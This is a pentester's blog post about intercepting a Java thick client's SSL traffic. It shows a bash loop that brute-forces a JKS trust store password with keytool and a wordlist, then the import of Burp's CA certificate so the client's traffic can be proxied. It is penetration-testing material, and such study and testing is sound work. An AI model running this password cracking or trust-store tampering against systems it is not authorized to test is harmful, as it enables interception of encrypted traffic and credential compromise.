Recently during a pentest I stumbled upon a thick client in Java that came with a configuration file (*.properties) referring to a Java Trust store:
# The following property specifies where the TrustStore file
# containing the trusted CA certificates or trusted certificates
# can be found.
javax.net.ssl.trustStore=cert/clientTrustStore.jks
An SSL trust store is basically a container that includes all the server certificates that are trusted by the client.
This client was making a SSL connection to an endpoint web service. To be able to put myself in the middle of the protocol, I had to add Burp's CA certificate into this trust store.
1. Brute force the truststore password.
Here, a good old bash loop calling keytool with a dictionary file did the trick:
$ for pwd in $(cat ~/pentest/dictionary/most_used_pwd.txt); do (keytool -list -keystore cert/clientTrustStore.jks -storepass $pwd 2>/dev/null) && echo FOUND PASSWORD $pwd; done
keytool error: java.io.IOException: Keystore was tampered with, or password was incorrect
keytool error: java.io.IOException: Keystore was tampered with, or password was incorrect
keytool error: java.io.IOException: Keystore was tampered with, or password was incorrect
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 5 entries
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 8D:B8:(hidden):41:1B
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): 15:37:(hidden):25:E9
(hidden), 02/04/2014, trustedCertEntry,
Certificate fingerprint (MD5): E4:61:(hidden):59:BE
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 32:DE:(hidden):BB:4D
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): CB:17:(hidden):FA:1C
FOUND PASSWORD password
2. Add Burp's CA certificate to the trust store
Well, ok, here the password was "password". So I could list the contents of my client trust store. Now, adding burp's root CA is easy. Just create a listener within Burp, use that as a proxy, browse to any https website, display the certificate chain. Save the root CA certificate to a file.
Then, to add this root CA to your trust store:
keytool -import -keystore cert/clientTrustStore.jks -file PortSwiggerCA.cer -storepass password
3. Start playing
To confirm whether your certificate has correctly been added to the trust store, list its contents with the keytool "-list" command used in the bruteforce above:
$ keytool -list -keystore cert/clientTrustStore.jks -storepass password
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 6 entries
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 8D:B8:(hidden):41:1B
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): 15:37:(hidden):25:E9
(hidden), 02/04/2014, trustedCertEntry,
Certificate fingerprint (MD5): E4:61:(hidden):59:BE
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 32:DE:(hidden):BB:4D
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): CB:17:(hidden):FA:1C
portswiggerca, 02/04/2014, trustedCertEntry,
Certificate fingerprint (MD5): E4:61:D7:52:FB:7A:28:61:71:0F:FF:09:9A:47:59:BE
Now you can proxy your client app through Burp and start playing with the protocol!